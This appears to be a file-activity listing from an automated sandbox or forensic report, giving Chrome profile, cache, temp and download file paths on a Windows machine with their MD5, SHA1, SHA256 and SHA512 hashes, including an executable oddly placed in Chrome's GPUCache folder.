C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\LOG.old

MD5 a5548309e1ffb05a2986bf5f64c38dc5
SHA1 94c13fe6acb7d373c186ed5e968f7cd37ef11292
SHA256 7e9210b0bb37cb86df2e3ff9c56ab04876d9a91fb99cfb3db06c6ba277ad1cdf
SHA512 3d656d14c6c322489101b9b5f09d34ed54abb6eb4acc2628af5f66be5e51a776894485941afb21f21571f8feee845ca19c1d9d7eeb16e47ac3ee6e6f00f4a087

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\335e69ddec2b9ac6_0

MD5 2a4b71c64e2ed5320ce630513040bad7
SHA1 8e82bfa419872ef9e17ce07d89da5129fd91e9dc
SHA256 2a7650faa3fc4c574588eb11d226d9585d052ee1291b1423aa02efe70ec6bf1f
SHA512 dfc7f39c6558c447c42ca3a294de91dd1a0190094bf3c6e99eae47457621acb7f5415f4f6b75a29078e94589d07b976591abcd28dd79a7e4337cb8d7b766a534

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\8b9d3d96a54a65b4_0

MD5 1cc37bf1a86268aafe33ccae84928f16
SHA1 f9fb050261332e14a90c5654b8efcf698e13ec2d
SHA256 0ca544169681e461c1358d49dd57ebc30e14733cc7015d034cd1eacd2b382803
SHA512 4d237cb0c64a8249e742f1f1958a56652d95aa5b561039b67e06139a1dbff9ab8ec872e3dc86cdfc4d5fd83c640ca429104e7957739e54f23848928ac0a6ca21

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\b5a4cbeda3f42093_0

MD5 09bf9e207630efbecdac828f87745b06
SHA1 41c8161481bee8d90b8ae0956abdd111f19b3b58
SHA256 33279cec6c54d5a080ef81650c363899f6576fd92863ca164b42c087819052c5
SHA512 9fdea9fc5804f7b22e3034aaf710649a7416016d6dcfb80b54dcf733be89272289e44eab79711b5aed141556608edf3785e82f3e6297ff803a1205dbacb7568b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 c7b36ae6db648544218a8d7d9ff2eb7c
SHA1 b78aa69e27d99ced6dd591b26cd09a9d33ff9003
SHA256 7bd40b9fad14062c43b4c9b21e87f64b5cacf43a71ee713a7c74af556a8f5fe9
SHA512 444c20b7b7049ed70f5e8d6edd9b5d5bc2889f08dc9e67ba9c0688bbb900a2d914ae2329ad528524337b5f504bfc41bee78c5c315e04ddef0bb7445770083869

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 cfbfb425872621d0ce4f6d77a66e286a
SHA1 26f6ce7c1292cc7cde589f699c64e70b04fb87d1
SHA256 15fb386badc4e6073c3436fcf263c3f5c5447a45810248264ecbd1049f76fec7
SHA512 2c35c16264aa12ed7727bda2ca3baf45be33c110b438fd15aa4e8a18689bc6e8c558103d05243c1a8029ca97439d02241a625124c5ca9454c09e4fcdbb5015a1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 f577dddf022bb643172c8dbb7856d56e
SHA1 c6816eeb02feaa3a82ab003e36a6c9e67dad5bbf
SHA256 a3d70f428a862b3daca31ec0a0c431512a3be962d2cafdb6d6b0fe56e8c8f23a
SHA512 708e95a9b6c804e4b452e961b39b07185f050e483e277b725e3a4ba6e38e2f4dab1b805c3ff9571a10afba87a747ab0256f92d684bff142ac95a73fe328cfab1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\LOG.old

MD5 65eb23dc1aba7736ec863bc8379325f3
SHA1 abec1820ea1e986f4a12763e3a93103f60275c6c
SHA256 7c2964cd50c82544e3db27f0fed73b56d0aebc29af649068bca7ba20f7f78fd8
SHA512 69a9a78faca4467a8e4250b07361a2327477248a621e2ac30c8a02049375f3911dcef9f305a979e4a03e3c56227e4e3ac4110606dc33505a6ac79f93897d16c2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\da70d77928e880b3_0

MD5 d8dd8c77f528f5d141ca38c6df28c38b
SHA1 ca56f7976127cfd8d67c4bc7be4017c16271119b
SHA256 e0f4bb5e9a3a375801fadbab0152fae59d01179204f21a595f8aa98e5c50bf79
SHA512 dc5f86190b977bdebdb087a4dae978004bd2a55483f11f3c452fc38f5c30a542805484007338925280b2b6b0382d57d0fffbbeeaafcfc005a1f4daf01134a5c8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\b77c31245b20c52b_0

MD5 fe31f843619a00dfbcfaafdf397b0ad3
SHA1 a489d1d6bb38c756ad6251eb0008acdb9046bcac
SHA256 da705abfc5b1b25b19fbaac7f8fc4844750125dc8aa1e8e4c6c6468f42eca717
SHA512 226e055f53abe75546278dbfb8e837d478074f2c98b2a0aa84d8f9e25377176204fb52eff458ed1c9c5805cbe06e3c361c817a6681b88bd6c0f7f4004c134fd9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\7fd58b2eaee2aab0_0

MD5 3076fb4c27e4de8ab17bd93d9b3fb05b
SHA1 56a77b6ddc1d3251d3af831bd8ac6341d11192d9
SHA256 21231c2a6afadc7bc8172c4c60eeee9b26a5a634e307b4ae3447b649b3140cc7
SHA512 1f2ce5a4569c2efe411e1c8f03af8fa3fe333419c6c60d38a04422aa65798f23f7c3a958e7efb6e90a5ab581b4272ee89133bbd97d989212f672118d2164970b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\7cb608b446c273c2_0

MD5 0dbb063f1e45f06fe62a3a359566916a
SHA1 bc88d0567134ebe9c38b1ebc5cfd72fae6a4d2f2
SHA256 27650d1f94b21d1cd998d5b55eaf3c95602c56e8f918b14b06eaac2aee4134a3
SHA512 658465da29ad2d412c20bdda4cb69fcdbb7def2a7fa8bae7c04bd6be85907503d38f80556884d482ca20044b3e77949da6b23f5d348e770f95c0da770cc2a0ee

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\391e884e1ffe7095_0

MD5 94546225ab97951485ed9e9320cf7d82
SHA1 93a59c6b8034562838eb5deac33f5ba32fa22d42
SHA256 4e3fdeec98bb1420ee3075074f259369710c3e987f9e80b1aba62db2c7953f66
SHA512 e44820810ea4292a046fdce5a73ffc4852eeb4eb5332ef8e31af2e4ee8893a3d4aa56a0a23c7b0f7ab72d5e439b909099b1022369e49670dc6adbb9f1f1d6eda

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\f7c1a2eb764a4448_0

MD5 168ceae9211aa0a000383fe110dafe77
SHA1 4be64cb1a7824c461f7a0730d72276db5cdd3a3d
SHA256 017cf0ce95a557c1ebe9459c26a29aa6069d7c66ea45373b2c6db4933249bb81
SHA512 a8052818a918bab9c92460d32ca8e0a34bf34c8face8e70d8450ab7cbd0a2993072e4cc650cdef7640ecc728d8085a779bb9922e678d6c8a2ec5c1d92fe78ee4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\f05ba7f3c30e1e17_0

MD5 1514d5f7a5e50fa75dd4330a2e5fe267
SHA1 a198a25f55e92e1f45ea73bb77d32713c88b0daa
SHA256 429ee7ff4553e1f0da4f450c979a65431e23aea4ad62ea07e374cb3626a99113
SHA512 13d64e88c4b9d482d803e93667b896cfcab1b39626b7350ed18124d1668e620c8686b46eef534aeff425d9b6fbd0ba67afefa44b050db539a8c905a01cb6206d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\d02a15598607b75f_0

MD5 c33b01fbcf610d60025a544f27c0a6bd
SHA1 0c9e3210b769a2ec382b319c3179fa16c6a21a9e
SHA256 544a8a3cef60c4e3f0562c8b662d64c80bdcdd04ba1f9c59f26567b11e47518f
SHA512 7c8b38ad26851f0ce8ad7997a00dca3c6a618e28de69ddff332d681d09d9de3e0a25369f4a850e35f5cb1d9b9fbeea410ee787d0e9e43e15eaad817f114d6bd3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\a6fe5482dc2ae5ec_0

MD5 caa4d55e144eec7508a438ed6cce7cad
SHA1 9158e6b9df655d38c9193d7212f0e8f1c0127d50
SHA256 8314a24c1fbe12d1db8be0d23935bcc0327fcdcc6e2fe64b907e6a1d01dc7b93
SHA512 9fea1ed6a6c812d5c85d0a8a67165f57ca2f67658186ba4b5c179152850dee81ff36bf9ff17e713cc25951ecc0e08bbae3df519fdc5cb800184e39ed5c28b12f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\869543051af55f4d_0

MD5 8c51548be413fb93fd4e51101bd8d3a0
SHA1 526fac73b31203e80907559b7459ed703984c955
SHA256 c1a09d826e035e93f079cfcde5493931d4e052630cb84c2636dca5f764e09378
SHA512 4c45e2f944ea57458a5d614e8ae5166073ae6d21f1216a06c3d15b1543a529111bb96babacb3942ce5966c9d9b39237c0692d7425b24725d128fef0bc80139c7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 b591b792605507e4f994df4eb15c2a0b
SHA1 7a4b4f425b6b703d7a247bc7743c3ef9d5b93b29
SHA256 6bd384070463f08fc36d3abb73a086d6d13444a99953bf3107082e2f19a08cec
SHA512 9de1fb40ee350121e118fec47a7b5dccc36c845604c9faac82a87d74b7158610ad289a168ffc56f301da99c9675b7b6421117a442880ed599a68c034d24f15d6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d59671b8420cd4d69e3b8c152c0a5a94
SHA1 0c9f84b68da9b3c67103ed4dfd8d85c98acfad59
SHA256 5491763d00765891a5f15aa94a0e184da1d6964aeb6002269fe57a78df80e8fb
SHA512 9c9f52730688ea4fc793d6ae8481c69aabf97b182a5c9e49d6523f7c639488a153a91db1eb44f2fe338a2ca9a9b5b5baea21b377666e53c9d3963c6708f47b13

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 4e582280e70e3a87a5ec4485cbfe5d8e
SHA1 151ae5e2518dc27122894c993916cd3685d84e66
SHA256 010087279402ba0416c960f4c195590a5f874982b4ce5e8009c10fbbdf4f35c6
SHA512 a1cfc839013f97390e32f081a81fe404e442147e8aa75e408bdfadaf0609ead4984c532fbecebef1aa78e6bed00a8b96d1d55e2d2867106889f21fecd98d21ec

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 fc52a3602b8bd3997304e3464efdbd50
SHA1 76e00a212b5b7a072397108a9697452529a35296
SHA256 75791961f9782affe4a4495841c392392f5159eec1979589ce6e14a37c75fe5b
SHA512 3452be32b716e39ff46fe0dabd3c6f87798da048653e2d33518d6e6d6642336967dc647402be9eb33c9905c752752d15925df802cb884a1c4dd737a258bfd94f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 8e675c85a3ab4727b2cada3ca0237bca
SHA1 cb55a3ce52cbe168a31b21337f40dc368aa0bf57
SHA256 53b820cbbfc031133df0761f78c71d6764a32abed9d1a61010f16e1ca326ebb3
SHA512 5c30dc1f14829fd717f74d29ec888f50345c2d0d19bd81bac391743008b7a5520e21157e4071594c681fcc42fc2f5fd15a7761fcf48ad82990ee5a130cdc9996

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 830432a36f525f29c6457112539511de
SHA1 368997c2aeff82b86dee9e41026cda1362b69dfb
SHA256 cbc85b5f7d280f9be20ab08f8cd256af70b82e344fa27522741bcb7859452ee8
SHA512 b6d0aa8ca06e54c6a5b2e7391833b943fb1c531c36b738d9d59f03aab155f876310d1c6078ad15284d6c3b15a25c35d6198957d783838d47359d0d5b1a11c64f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 e47a792ecabf2c959d4c648263e65152
SHA1 01b7a6c12db12fa6a2a222c9dee3820bad2c66c8
SHA256 723f24e2219c296af817907b869b7a29d828e56c0e6d9decb135ad08741204bf
SHA512 cc53a95e7d0e7803f88aebd567756fd515657c3dad3a22e106980addccd29eb3dab7edb9c987e3f6fa0b74f4b3abaddfa5131b641c793393b26d92a154026e6c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 ec419badb195fe963485f4324a7a1adb
SHA1 f325787cbf8a0851fbe944b12449eafc66522b72
SHA256 06916e29c922532585383e1781039fde80059fd9fd62fb2153f4056c0e5161b7
SHA512 59eafba7bd6278b76481c5d5f3971534ec07eef24c19150169e796dec716a9f1f2eb3b5f3bbdb37133d56a3779a6c597c2e1ca22e05aed55e687a6dcd9900517

C:\Users\Admin\Downloads\Unconfirmed 578623.crdownload

MD5 149cc2ec1900cb778afb50d8026eadf5
SHA1 a7bc1bbc7bdc970757ec369ef0b51dc53989f131
SHA256 817a695e53a1d6e24f2c701751b4d18468f20698f30fada420dfba6e21a09797
SHA512 d617654478beb6325d86c108cddaff8f8d658a235d26b8e0282ed85dca826bdb62b0b67e749c7cd421dbae1d98084220e2f4d5779badb8fd7ab07ff333a35553

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 41c11842795ba0013bfc296ec9175517
SHA1 f94fdec709ef2f3496882bcd2a82bf294c57e827
SHA256 592619f26896757f3b5731afb4baaae2b20d05f7c336d8b736c27a21881bb23b
SHA512 92f74a2383a1c4ada6afafedcbe1ef9c03e3358818b7b2fb6cf51f8f26e0274ae431b6017c7db66f86f3e12a985bab01e13055844dc4c57f947cb9a7c7046d48

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 987a07b978cfe12e4ce45e513ef86619
SHA1 22eec9a9b2e83ad33bedc59e3205f86590b7d40c
SHA256 f1a4a978ce1c4731df1594043135cf58d084fdf129dd1c8e4507c9e06eac5ea8
SHA512 39b86540e4d35c84609ef66537b5aa02058e3d4293f902127c7d4eac8ffc65920cb5c69a77552fc085687eed66e38367f83c177046d0ecb8e6d135463cc142aa

C:\Users\Admin\Desktop\CompleteEdit.AAC

MD5 7999f942ff7190cb7c9f0e04d6dc3d41
SHA1 66c3743d7a3d0885a624600abd71486c63a52904
SHA256 8c52ba6df441fea41e87285a7a79e790773407b4d377730b4f834b067d355776
SHA512 9ea2f9e0e81b69895023da6a5e6f4850bdfb0e37d847a6086afaa3debb928673276fa149b2e8df154f6b0498191e5e7ab29c22bc415a761038435abcc4607cee

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 451d0b85dc6e82118aea41a973aed7a6
SHA1 9584e69d5d81a1e7a2cd7a94b4ef2cef55f5e838
SHA256 bd7906708ccc43de26635eb152e910414506efe4173eb01e47a669a70a0b5f74
SHA512 3fc54cf1cf0b3f20e23c6332f2f181093ae4ac47a79ea98b4d5996801be9e6bd11488b8874b1db13f19faa006818906f47eb622ff3992ddabe15a309172c4fb6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7a1f78600f90b5f4a72d4c6290633017
SHA1 fdf48a84f89a49d4302e123ec391a6aec18d99a3
SHA256 44a8d1a059836716c10d28cd129e2fdcca4801b4516d1b562105141032905422
SHA512 23b51dcf05cc23f52da2afae6cc497d9d52fe60c50dd4629d2ede7cc68b28cf22da16cad3b23f305c648da44402381fcd71d56fc89804befbb897429cd9874d6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RFe5d6eab.TMP

MD5 529a4259c79ea818eb9e65e5d62c2ab5
SHA1 de2f664f8bc1b5e55cdfa45227d69fcdf53eeb9e
SHA256 5f76af03f642e3d235466ef5e4b2bb8fb04ebf30c8462859a8f95adea8d7c8cb
SHA512 582869278ebbe17c9acab9ed69993eace430e5d45e5aa336d7b50d8f3d39779e2a7c912f067e7d1e7cf7c1efbbf0b77abf7826c3cfbeaefc2dc367200901dd21

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\2efc072a-80d3-40cb-bf2b-66f643990507.tmp

MD5 7132fd6959b00c3a741e13eb2ab02b5f
SHA1 ffb220b71003dff5800be3e5fbfd88952b947e98
SHA256 6e206ab4f1ba52c9f68517b40bb1111ed23b457127075f4ad951004ce47f0bea
SHA512 d14f99e4b161b02a10efedb323b9b8955c08a6e059886d7f0f8b6db6946ed4aba4db86d6e5401ad5ca07d3581edfd5f958fe2b0e02d037922f8994f3383c0709

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 bef02412835ce116c1773df880bcea0a
SHA1 c6cd82d4c26f531cb06b5f78a27bcc601195da3b
SHA256 87ed5b5289b17a372fe55c52660c29848c489fe78a21f28d3ea462db07bcf0bf
SHA512 70e9d079a83461ea9f36c76f06439a89e741ef704d2003bd3d294adb6032b34cbd05a4f217adc97dd9373a131fc7aca1e715b36a04519b66de982d2e4f977b0c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\34c70992-8c5d-417a-b1dc-7098e1a40391.tmp

MD5 30a048796009998ae0cdfdd13242226c
SHA1 91584a01998e7b7d053133fc9cba3214b323e1d5
SHA256 e84c40f34350e1bd25067ab37ac3d78ea0e31a74bc394e6c293fdb7ff9de2150
SHA512 4878251f401165954eec09249b5d3e1e1858709886d6135f583f1429054b3f1b9a49a9ecd4ea7adda19a888a9a67e247a370b19cbdb2dca5ed8187695f14e2a8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1.exe

MD5 de37f42e10ab1e28b362cf971481add7
SHA1 ebe3a0bf886142457f9cb0bd500edf8a10487df9
SHA256 e9fafdd66f6009e20f477e1a11d137ce7d7ab3508b67268cd4f43ca7013b7e91
SHA512 4a0ba36b625d81f2527cc6822f8949bbf0461ba3f7fd427045b651c9eab2b1044b375e4061d48718823594bb6fea72277dfeaf48b644c980197b9b9683b1328f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZUDOK5SXI9GS0GQF9ZCY.temp

MD5 b1c1cca38e6b90166331d0aee17527bd
SHA1 36d4447eb6fce7e8410b873b102c60947b29bd7b
SHA256 10ac5f966e68f52aa3c4c861e3353e952e97fbb70d4b07bc43ff5a087fc2e1d6
SHA512 82540817b0d582e2a41690d82bbbe05dc3a44bb3cb756c8466e441f35b84dfc2a3fff8f0e38b9995ea7287a8bc39ba559b699e95e7f32f5c0b9d82576bd7e800

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RFe5dc47b.TMP

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\7a22379a-fa26-44c4-8736-d6c8d48d4790.tmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Temp\3fbf20a4-2b10-4e72-afa9-498207c3f95a.tmp

C:\Users\Admin\AppData\Local\Temp\scoped_dir4044_197832267\c1e019e8-8dc5-41f9-b377-cb36384ff21a.tmp

C:\Program Files\Google\Chrome\Application\SetupMetrics\c4d5909c-b380-4a83-bfb5-1fd8a366296e.tmp
